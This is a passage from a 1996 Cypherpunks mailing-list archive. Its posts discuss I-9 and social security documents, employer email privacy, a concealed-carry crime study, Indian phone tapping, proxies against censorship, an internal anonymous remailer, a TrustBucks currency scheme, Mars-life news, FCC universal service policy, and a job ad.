To: Bill Stewart <tcmay@got.net (Timothy C. May)
Subject: Re: Internal Passports
In-Reply-To: <199608070259.TAA17424@toad.com>
Message-ID: <9608071707.TE12105@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 6, 19:59, Bill Stewart wrote:
> Subject: Re: Internal Passports
> At 07:37 PM 8/5/96 -0700, you wrote:
> If you're _employing_ Anglos, you're currently required to disrespect their
> honesty and demand proof that their papers are in order to fill out the I-9
> form.
> There's a list of "one from column A or one from columns B and C"
> of acceptable papers, such as passports, birth certificates,
> driver's licenses, US Military ID, etc., which the government uses
>... 
> None of that is really proof of citizenship - after all, you could 
> have renounced your US citizenship and become stateless or joined 
> a foreign government.

Driver's licence and social security card are currently enough.

Before 1989 (or so, I'm not sure about the cutoff) the SSA issued 
unrestricted social security cards to people on temporary visas who 
had authorization to work for some period (e.g. students on an F-1 
visa could then work on campus - and the SSA would issue an ordinary 
unrestricted social security card). After 1989, I understand, that social 
security cards issued under these circumstances are marked "not 
valid for employment without INS documentation" or something similar. 

So, it is perfectly possible to have a social security card and a 
driver's licence without having the right to work in the U.S. The I-9 
documentation doesn't prove anything. 

I note that California requires some sort of documentation (birth 
cert, INS documentation etc.) for a new driver's licence. Don't know
about other states.  

probably related story:
This might explain why in 1994 when I was travelling back home to 
Vancouver B.C. from Europe via the states (cheap ticket), the U.S. 
immigration officer asked me "Do you have a social security number?". 
I said yes. She then asked "do you have your social security card 
with you?" I didn't have it, and said so. She asked to see my ticket 
on to Vancouver, and that was it. I thought it was weird at the time 
as I'm used to various questions, and hearing one that I didn't 
expect at least made the experience mildly interesting. 

-- 
Mark Henderson -- mch@squirrel.com, henderso@netcom.com, markh@wimsey.bc.ca
ViaCrypt PGP Key Fingerprint: 21 F6 AF 2B 6A 8A 0B E1  A1 2A 2A 06 4A D5 92 46
unstrip for Solaris, Wimsey crypto archive, TECO, computer security links,
change-sun-hostid, Sun NVRAM/hostid FAQ - http://www.squirrel.com/squirrel/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Thu, 8 Aug 1996 09:28:24 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail policy
Message-ID: <2.2.32.19960807211735.006c0ac4@tansoft.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:05 PM 8/5/96 -0700, Timothy C. May wrote:
>At 5:34 PM 8/5/96, James C. Sewell wrote:
>
>This comparison breaks down completely. The police are not involved, so the
>language of "probable cause" is inappropriate. 

  Then use the language "good reason as defined by the company's policy".

>Imagine Alice operates a courier service and owns and operates several
>delievery vehicles . 

  Here your example breaks down.  Email is not like the courier company's
  vehicle at all.  Bob didn't create the truck, he didn't think of it at
  any time as his, and he is not intending to use it to deal with someone 
  else on a personal level.

  A better example would be that a letter sent through that courier company
  that is from Bob.  If he pays for it to be delivered then he should have
  the right to privacy.  If, however, the service is offered free to all
  employees, or if the paper/envelope/time was from the company then we
  would have the same problem... is it business-related, thus open to the
  whims of the employer, or is it private and off-limits?

  The whole question comes down to this:  
      Is a collection of words written from an employee to another
      individual property of the company when it was written, edited,
      and transmitted by company equipment.

  The problem?  There's no agreement on the answer to this.

>(If anyone suggests that landlords cannot barge into tenant's apartments,
>this is a different situation. For one thing, there are usually terms and
>conditions spelled out in a contract about when and under what
>circumstances a landlord may enter the premises.)

  There are often terms and conditions spelled out in employment
  contracts as well.  I have had such contracts in every job I have
  held.  They all went to the point of saying, in essence, anything
  I create on company time/equipment belongs to the company.


>>  Just remember, as was said, once you make a policy it becomes precedence
>>and will stick with you forever... longer if it's a bad one.
>>
>
>Alice the Courier Service is of course perfectly free to announce new
>policies, so your point is incorrect.

  Granting that I meant precedent rather than prescedence I submit the
  following:

  precedent - n 1a. An act or instance used as an example in dealing with
                    subsequent similar cases.  
                2.  Custom or convention.

  They may change their policy at will, but the fact is that the decisions
  made today will "taint" or "shape" (depending on your point of view) the
  policies made tomorrow.

  
Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 8 Aug 1996 13:53:12 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: CONCEALED GUN STUDY
Message-ID: <Pine.SUN.3.91.960807171805.3165A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

A list member was kind enough to send me the URL for the Chicago 
University study.  I was thoughtless enough to immediately forget
who our benefactor is.  Sorry, friend.  Anyway, the URL is:

	http://www.lib.uchicago.edu/~llou/guncont.html

Below, I have reproduced the abstract of the study.  I will read
it in detail when I can carve out some time.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Abstract

Using cross-sectional time-series data for U.S. counties
from 1977 to 1992, we find that allowing citizens to carry
concealed weapons deters violent crimes and it appears to
produce no increase in accidental deaths. If those states
which did not have right-to-carry concealed gun provisions
had adopted them in 1992, approximately 1,570 murders; 4,177
rapes; and over 60,000 aggravate assaults would have been
avoided yearly. On the other hand, consistent with the
notion of criminals responding to incentives, we find
criminals substituting into property crimes involving
stealth and where the probabilities of contact between the
criminal and the victim are minimal. The largest population
counties where the deterrence effect on violent crimes is
greatest are where the substitution effect into property
crimes is highest. Concealed handguns also have their
greatest deterrent effect in the highest crime counties.
Higher arrest and conviction rates consistently and
dramatically reduce the crime rate. Consistent with other
recent work (Lott, 1992b), the results imply that increasing
the arrest rate, independent of the probability of eventual
conviction, imposes a significant penalty on criminals. The
estimated annual gain from allowing concealed handguns is at
least $6.214 billion.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 8 Aug 1996 00:05:40 +0800
To: cypherpunks@toad.com
Subject: Phone tapping in India
Message-ID: <1.5.4.32.19960807114112.002e8fa4@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


"The Pioneer" headlined on August 6, 96:
"CBI can tap at whim -- Agency has 6 bugging machines"

(The CBI is effectively the Indian equivalent of the FBI)

Apparently, these machines costing Rs. 7.5 million = $200,000 each, 
can each tap 7 phones in a 25-km radius, and were bought from a 
Hyderabad-based company, Fidelity Systems. Apparently, all that is 
needed to tap a phone is for the sleuths to dial the number through
 the machine, which then automatically starts and stops recording
all conversations carried out with that number, as well the numbers 
dialled by the target.

As it is, the law on wiretapping is draconian in India: on the occurrence
 of an emergency, or for "public safety", a designated government 
officer can direct that "any message or class of messages to or from
 any person or class of persons, or relating to any particular subject, 
brought for transmission by or transmitted or received by any telegraph,
 shall not be transmitted, or shall be intercepted or detained or shall be 
disclosed to the government." (This is from the Indian Telegraph Act 
of 1885(!), and applies to e-mail and BBSes as well). But with these 
new machines,  even this designated officer can be bypassed.

Under a box titled "Beware of blank calls", the newspaper mentions that 
when the sleuths ring your number to start tapping, you get a "blank" call 
(which one is quite used to here -- if that were enough evidence, the whole 
of India is being tapped!)

What technology is this? If it indeed works this way, what is to prevent any
large company or rich person from procuring the same hardware?

Apparently, the purchase was authorised by former prime minister Rao,
who is now complaining that his own phone is being tapped (serves him right).

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 8 Aug 1996 04:31:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Censorship through proxy
In-Reply-To: <ae2d3ca1160210042150@[205.199.118.202]>
Message-ID: <3208B9AB.794BDF32@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> Sing Sing (the country is now a prison, so...) is one of the states we
> should think about targetting for "special attention." Not in the sense of
> violence, but in the sense of offering help to freedom fighters, those who
> want to use stego, web proxies, etc.

A few questions spring to mind:

	Is encryption legal in singapore?

	Is the list of blacklisted sites available?

	If encrypted proxy software were available,
	how many sites would be prepared to run these
	proxies?

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 8 Aug 1996 10:29:13 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: SSNs (was Re: Internal Passports)
In-Reply-To: <Pine.SUN.3.94.960806122909.10763A-100000@polaris>
Message-ID: <Pine.SV4.3.91.960807175404.13468C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Furthermore, one's ten years of required FICA contributions for 
eligibility to collect Social Security or Disability, are a statutory 
proviso, not an administgrative "favor" that the SS Administration grants us.

That is to say, even if their computer doesn't show you as having enough 
contributions to be eligible, you are still entitled to make your own 
independent showing of the fact that you made the payments. It is NOT 
required that they have been "credited" to your account all along.

There are many many many ways to document for posterity, payment of 
funds. We don't have to depend upon subversive foreign nationals who 
think they are hot shit because they work at building bigger and 
better computer surveillance-state systems.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Thu, 8 Aug 1996 07:57:58 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Remailers at work
Message-ID: <9608071713.AA13368@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Date: Tue, 06 Aug 1996 21:05:24 -0700
> To: cypherpunks@toad.com
> From: Bill Stewart <stewarts@ix.netcom.com>
> Subject: Anonymous Remailers at work

> I've recently run into a couple of business problems at work
> that could be solved by (slightly modified) remailers.

> 1) Manager performance review, suggestion boxes, and questions to
> visiting honchos - there are several departments that are using
> "email to the secretary who'll take your name off and forward it"
> to handle this problem.  Remailers are an obvious solution.

>  It would probably be worth modifying the remailer to use a permit-list
>  as well as a block-list for destinations and maybe sources, 

>  Any other reasons to install anonymous remailers at work,
>  and things you'd do to make them more attractive or
>  less scary to corporate network administrative types?


I have a very crude + simple remailer using shell scripts.
There is re-ordering and a standard message size.
There is no scope for receipts or replies.

I limit messages to 1kb to make it harder to send images.
(There was once a management complaint about images- nothing
to do with me or the remailer which hadn't started then.)

It can only send and receive mail INSIDE the company.

I have not advertised it widely, for fear of a management veto.
It carries a warning to be sensible, and I'd be able to read
the mail log following complaints.

There is a short banned list, intended only to stop looping.






In another message Bill said:
> immigrant Brits and ...  speaking funny-soundin' English at you.

Um, some of us really do speak English.  To the point where we struggle
to make out Larry King and guest both mumbling away at high speed.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 8 Aug 1996 05:18:51 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Phone tapping in India
In-Reply-To: <1.5.4.32.19960807114112.002e8fa4@giasdl01.vsnl.net.in>
Message-ID: <3208C12F.15FB7483@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta wrote:
>  
> Under a box titled "Beware of blank calls", the newspaper mentions that
> when the sleuths ring your number to start tapping, you get a "blank" call
> (which one is quite used to here -- if that were enough evidence, the whole
> of India is being tapped!)
> 
> What technology is this? If it indeed works this way, what is to prevent any
> large company or rich person from procuring the same hardware?

Do telephones have "caller control" in India? (ie. if you call
someone, can the callee not hang you up?).  If they do, then the
technology is quite straightforward, being a device that emulates
the exchange and proxies on calls.

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 8 Aug 1996 09:40:50 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Internal Passports
In-Reply-To: <RDo0RD45w165w@bwalk.dm.com>
Message-ID: <Pine.SV4.3.91.960807181525.13468G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


You can act through a corportion; if you are using it as a true "alter 
ego", it will be put aside by the courts and you will be assessed back 
taxes, interest, and penalties. The employer will also.

If the person who pays you, has the _right_ (exercised or not) to tell 
you how to do the work.... you are his employee. This is a summary, but a 
good one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Thu, 8 Aug 1996 14:12:41 +0800
To: cypherpunks@toad.com
Subject: Re: STEGO GUNS
In-Reply-To: <Pine.SUN.3.91.960807150329.28064G-100000@crl3.crl.com>
Message-ID: <199608080121.SAA20077@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 7 Aug 1996, Sandy Sandfort <sandfort@crl.com> wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                          SANDY SANDFORT
> . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>
>C'punks,
>
>On Thu, 8 Aug 1996, Julian Assange wrote:
>
>> Correlation != causation. What are the figures on other crimes?
>
>I'm waiting for the official study itself, but the article did
>say that the study showed a shift from violent crimes to property
>offenses.  If so, that's a trade I'll make any day.  
>
>I'll see if I can get a copy of the study when it is released.
>
>
> S a n d y
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In 1981, the city of Kennesaw, GA suffered 17 violent crimes and 55 burglaries. 
In 1982, Kennesaw passed an ordinance requiring all city residents to own a 
firearm, and there was only 1 violent crime and 19 burglaries. In 1983, Kennesaw 
experienced 3 violent crimes and 9 burglaries. I think that the cause-effect 
relationship is obvious.

Jonathan Wienke

"A conservative is a liberal who got mugged last night."
--Lee Rodgers

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Aug 1996 14:13:58 +0800
To: schryver@radiks.net
Subject: Re: Alien life
Message-ID: <01I805OF0QJ49JD2RG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"schryver@radiks.net"  "Scott Schryvers"  7-AUG-1996 11:08:59.39

>NBC News at Sunrise has just announced the discovery of alien life on the 
>planet Mars.  The lifeform that became extinct more than 2 billion years
>ago was found as a fossil in a meteor that originated from mars and landed
>on earth.  The fossil found was a primitive germ life form.

	A: This is not cypherpunks material. I am replying to try to prevent
urban legend formation (of the UFO suppression type). B: You are quite
thoroughly misinformed, as is NBC News if it is claiming the same thing. What
have been found are some molecules, of the type known as polycyclic
hydrocarbons (same sort as makes up cholesterol, in essence), that _may_ have
been produced by a lifeform. Other, unliving chemical processes, such as
combustion under the proper conditions (see buckyballs & buckytubes), can
produce the same thing. Yes, it _may_ be from life, but we aren't certain yet.
It is most certainly not a fossil, and the type of life form that it _may_ have
come from is as yet not possible to determine.
	-Allen, Ph.D. graduate student in microbiology and molecular genetics




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 8 Aug 1996 10:56:38 +0800
To: Scott Schryvers <schryver@radiks.net>
Subject: Re: your mail
In-Reply-To: <199608071019.FAA15721@sr.radiks.net>
Message-ID: <Pine.SV4.3.91.960807190454.13468N@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


No, they announced that some organic substances had been found which 
_coul have_ derived a lifeform. There are natural means by which the 
substances could have arisen.

I shouldn't have been surprised by the speed with which the pop 
media/cartoon news networks have jumped all over this. Shit, even William 
Jefferson Can't-keep-his-pants-zipped has gotten into the soundbites on 
this one.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TrustBuckFella <TrustBuckFella@nowhere.com>
Date: Thu, 8 Aug 1996 13:30:11 +0800
To: cypherpunks@toad.com
Subject: Re: TrustBucks
Message-ID: <65tr6crmj9@nowhere.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
"Robert A. Rosenberg" <hal9001@panix.com> writes:
>I fail to see why/how the initial swap of  TrustBucks(Alice) for
>TrustBucks(Bob) followed by Alice returning the TrustBucks(Bob) [as
>supposed payment] differs from her just paying with the TrustBucks(Alice)
>in the first place [ie: He is willing to accept the TrustBucks(Alice) as
>payment for the TrustBucks(Bob) that she will use to pay off her debt]. The
>net result is the same - Bob has the same amount of TrustBucks(Bob) in
> circulation and has an amount of TrustBucks(Alice) equal to Alice's payment
> [the back and forth of the TrustBucks(Bob) is just playing "Right
> Pocket/Left Pocket"].
 
I admit, my analysis is probably flawed and I appreciate you challenging
me on it. But I think it's more complex than the net result of single
transactions.
 
The way I figure it, if Bob could accept / not accept any variety of
TrustBucks, then he can manipulate what varieties he reports being able
to give in order to escape debts or manipulate what varieties he reports
being able to accept in order to keep debts unpaid (for interest,
foreclosure, etc.)
 
    For instance, Alice is paying off her credit card, which pays Bob a
    big 17% interest. Bob would rather not let her off early. "Nope, we
    aren't accepting TrustBucks( Carol ) this week. TrustBucks( Dave )?
    Let me see.... hmm... nope, sorry ma'am."
 
    For instance, Alice has just eaten at Le Cafe Bob, and is about to
    leave. Presented with the cybercheck, she "discovers" that she
    hasn't got anything Bob is willing to accept. "Sorry 'bout that,
    Bob. Ooh, hafta run! Bye bye."
 
 
So it seems to me that the simplest course is to allow payment in
exactly one variety, the payee's own. Bob can't credibly claim to not
trust himself.
 
You might object that the same problem is incurred anyways in
TrustBucks. If Bob refuses to trade TrustBucks( Bob ) for TrustBucks(
Carol ), isn't it the same thing as refusing TrustBucks( Carol )?
 
I think it's subtly different, though. If Bob can accept other people's
currency, he need not issue any himself. He can credibly refuse early
payment, since no TrustBucks( Bob ) even exist. If Bob can only accept
TrustBucks( Bob ), then Alice, who reports having no TrustBucks( Bob ),
can't "innocently" incur debts she finds she cannot pay.
 
 
 
 
>If the value is obscured there is still no verification of how much they
>have outstanding. So long as all of the TrustBucks are listed (with the
>amounts listed correctly but obscured), there is no way to verify that the
>claimed total is accurate unless you monitor their list before the swap and
>after it and there is only one new TrustBuck listed (with the correct
 
As I said, my mechanisms are probably suboptimal and possibly flawed.
That's why initially I presented TrustBucks without extraneous
mechanisms until that was objected to.
 
However, in this case the information that is wanted is whether a
certain note is outstanding or not. The sum of the list is not needed.
Indeed, one could have multiple lists for multiple identities. Or so it
seems to me.
 
Come to think of it, including the value doesn't do much.
 
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQCVAwUBMgkhuJi7GCxryNrZAQGD+wP/QuVPojsniRdqsiqSC/vnXqBp91cJIiEl
p5cyd1dKfEvMcqW0BKB0sFq3dqFh7dEBsbDZeh17gfJnQ7oBvQgXRqhEHst0UOCd
r3+tzE5jLr7OnW1fhxo1Q2529EcEJgDA23Rp/92j7WTjJEYkb1uu2v61Uo3x00j0
XpHdq2x9jhM=
=6Onp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Aug 1996 15:36:10 +0800
To: cypherpunks@toad.com
Subject: Babble about universal service
Message-ID: <01I807LCWIHW9JD2RG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I wish that people (like Phil Agre, who claims to be in favor of
democracy on the Net) might get it through their heads that many - probably
most - of those already on the Net have no desire to see every redneck on the
planet on here, much less pay for the privilege of their being able to send
inane messages to us.
	-Allen

From:	IN%"rre@weber.ucsd.edu" 17-JUL-1996 23:08:46.62
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: 2 Jul 1996 17:03:29 GMT
From: rh120@columbia.edu (Ronda Hauben)
Organization: Columbia University


Report 1

I just returned from a fascinating week in Montreal, Canada where I
attended the INET '96 conference held by the Internet Society. I will
try to write some reports about what happened at the Conference in the
next week or two as it would be good to have the online community
discuss some of the issues that were raised at the Conference.

What became clear at the conference was that this is an important 
time in the development of the Internet. People from around the 
world attended the conference and most expressed the desire that
the Internet be made available in their countries for education
and scientific and other uses. Some of the focus of the conference
was on business uses of the Internet, but it seemed that there was
a great concern among the people I spoke to that the Internet be
available for educational and scientific and government and 
community purposes, not just for business uses.

I want to start this report however, with the last talk that was
given at the conference. The final talk was to be given by Reed Hunt
of the U.S. Federal Communications Commission. He didn't attend
however, and instead the talk was given by Blair Levin, Chief of 
Staff at the FCC instea.

A version of the talk is available at the FCC www site. 

The talk was a surprise as it seemed uninformed both about the 
history and importance of the Internet and of the important public
policy considerations that need to be taken into account when making
any rules for regulating the Internet. 

At the beginning of the talk, there was the statement that Reed Hunt
was the first FCC Chairman to have a computer on his desk, but that 
he asked his staff to explain how the Internet works. So instead
of a commitment to learn about how the Internet developed and the 
significant impact it is having on the world, the speech presented
us with the glib "the Internet gives us the opportunity to change
all our communications policies."

The problem with this is that the FCC is therefore starting from
scratch, throwing out all the lessons that have helped the Internet
to grow and develop, and instead, creating its own models.

In his talk Blair Levin listed five principles. They were:

1) How can public policy promote expansion of band width?
2) What rules can we get rid of or have?
3) The concern with pricing.
4) How to make sure it reaches everyone, especially kids in schools.
5) How to make sure it reaches across the globe.

The problem with this was that it took universal service as the 4th
point, and then basically substituted access by kids in schools for
the principle of universal service.

During the talk Blair described how the NTIA (the National
Telecommunications Information Administration) had submitted an
important paper to the FCC on the issue of voice over the Internet.

This made clear that the NTIA has not submitted any paper to the FCC
on the issue of universal service, despite the fact that they held an
online hearing on several issues, including universal service and the
Internet, in November 1994 and the NTIA has done nothing to act on the
broad expression of sentiment for universal service that was expressed
during that online public meeting.

When asked about that online meeting, Blair said that the FCC knew of
the meeting. However, it seems to have had no effect on their
deliberations, or on the request of people that the FCC open up their
decision making process so that the people who are being affected by
their decisions have a means of providing input into those decisions.

In response to a question about the need for universal service Blair
responded that that was the obligation of other branches of the
U.S. government like the Department of Education.

He said this despite the fact that at the current moment the FCC is
supposedly making rules to provide for the universal service
provisions of the Telecommunications Act passed by the U.S. Congress
in Feb. 1996.

Also, he claimed to welcome submissions into their process, but when
told that it would cost over $50 to pay postage costs for a submission
since there were over 35 people who had to be served (and postage on a
minimal submission was $1.45), he said to see Kevin Werbach a lawyer
at the FCC, who had come with him. Kevin Werbach offered no means of
dealing with the high cost of making a submission.

Many people at the Internet Society Conference applauded in response
to the question about the lack of concern by the FCC for the principle
of universal service to the Internet. At the Internet Society
conference many people spoke up about the need in their countries,
whether that be Canada, or Norway, or Ghana, etc. for the Net to be
more widespread and available to the public for educational and
community purposes. Many were concerned about the lack of ability of
the so called "market forces" to provide networking access to other
than corporate or well to do users. Yet here was a talk being given in
the name of the Chairman of the regulatory body in the U.S. charged
with making the rules to provide for universal service, and the talk
was unconcerned with the important issues and problems that issue of
providing universal service to the Internet raises.

It is unfortunate that Reed Hunt didn't come to the conference and
take the challenge to learn what the real concerns of people around
the world are with regard to access to the Internet. Isolated in
Washington, with no access to him possible for most people (though
someone from one company told me that he was told to send him email
whenever he had a concern), it seems difficult for the rules process
to be able to produce any helpful outcome. There need to be open
meetings and sessions where people who are concerned with these issues
are invited to be heard and to discuss these issues with the
FCC. Instead the process is going on behind the same closed doors that
the crafting of the Telecommunications Act was created by the
U.S. Congress.

It is a tribute to the Internet Society that they did make an effort
to invite government officials like Reed Hunt to the conference.

The FCC will be setting an example for the rest of the world by the
telecommunications policy rules it creates. Will the policy be one
that recognizes that the so called "market" cannot provide the free or
low cost access to the Internet that is necessary to make such
universal service a reality? Will the rules created be based on
looking back at how time sharing and the the ARPANET and the Internet
developed so it can build on those lessons?  To have those rules be
based on firm lessons from the past and firm principles that can make
them fruitful, it is necessary that the FCC process creating those
rules be much more open than it is at present. If the FCC could learn
from the experience of the Internet and set up newsgroups and real
email access to the officials involved that would demonstrate a
commitment to a more equitable access to the Internet and to the fcc
rulemaking that is needed to make the Internet available to all. But
from the recent talk by the FCC official presented at INET '96, there
seems little indication that the need for an open process and a many
to many means of communication is recognized among those at the FCC
and thus there is even less evidence that the FCC is capable of making
rules to apply the principle of universal service to make Internet
access available to all.
 ----------------------------------------------------------------------
Michael Hauben 			Teachers College Dept. of Communication
Amateur Computerist Newsletter  http://www.columbia.edu/~hauben/acn/
WWW Music Index			http://www.columbia.edu/~hauben/music/
Netizens Netbook                http://www.columbia.edu/~hauben/netbook/
 Netizens Cyberstop





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Aug 1996 15:09:41 +0800
To: cypherpunks@toad.com
Subject: Job Opportunity - Distributed Document Work
Message-ID: <01I807S4ULZ69JD2RG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I can see some cryptographic implications to distributed
documents, such as the relatively obvious one of making sure your competitor
can't tap into them.
	-Allen

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 17 Jul 1996 04:04:00 PDT
From: Allan_MacLean.Cambridge@RXRC.XEROX.COM
Subject: Research Position at Rank Xerox Research Centre, Cambridge

Research Position in Distributed Document Technologies at Rank Xerox Research
Centre, Cambridge


Rank Xerox Research Centre, Cambridge Laboratory is part of an expanding
European based research centre which includes a second site in Grenoble.  The
Cambridge Laboratory carries out interdisciplinary research in the development
and use of technologies for supporting distributed organisations, with a strong
emphasis on the human and organisational aspects of technology in use.  The
laboratory has close links with a number of divisions of Xerox and Rank Xerox,
and collaborates with other research groups in the UK, continental Europe and
the US.

Our research programme (Studies of Technology, Organisations and Work) combines
social science and technical perspectives on the design of systems for use in
the workplace. Our current research projects are examining the boundaries
across which distributed document work is conducted. In formulating our
long-term research strategy we are focusing on investigating these in terms of
personal; inter- and intra- organisational; work-practice; cultural; temporal,
and geographical boundaries, and developing ways to take account of their
implications for system design.

We are seeking a research scientist to play a major role in developing new
approaches to distributed document technology from this perspective. The
appointee is likely to have a background in computer science or a related
discipline, with an understanding of distributed and collaborative
technologies. Applicants are expected to have a keen interest not only in the
infrastructural issues of distributed systems, but also in incorporating
social, organisational and psychological dimensions of work into the design and
development of novel networked systems. The appointed person will take primary
responsibility for the technological component of our programme and will join a
multi-disciplinary team involving computer science, pychology and sociology.

(Applicants for the recently advertised post in Requirements for Distributed
Services need not re-apply as they will automatically be considered for this
position.)


Informal enquiries may be made to:
   Graham Button (button@cambridge.rxrc.xerox.com), +44 1223 341500
   Allan MacLean (maclean@cambridge.rxrc.xerox.com), +44 1223 341517

Applicants should submit a Curriculum Vitae to:
   Sian Wicklow (ref. S1)
   Rank Xerox Research Centre
   61 Regent Street,
   Cambridge  CB2 1AB,
   U.K.

   wicklow@cambridge.rxrc.xerox.com
   Tel:+44 1223 341553
   Fax: +44 1223 341510

http://www.xerox.com/RXRC/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 8 Aug 1996 15:27:46 +0800
To: cypherpunks@toad.com
Subject: South Korean ID Card
Message-ID: <01I807XIOJLY9JD2RG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: Phil Agre <pagre@weber.ucsd.edu>

[I have enclosed, with the author's permission, a letter from Joohoan Kim
<sjokim@icg.stwing.upenn.edu> raising alarms about a proposed national
electronic identification card in South Korea.  JK encourages you to repost
the information where appropriate.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[I don't have the original header.]

Hi, all,

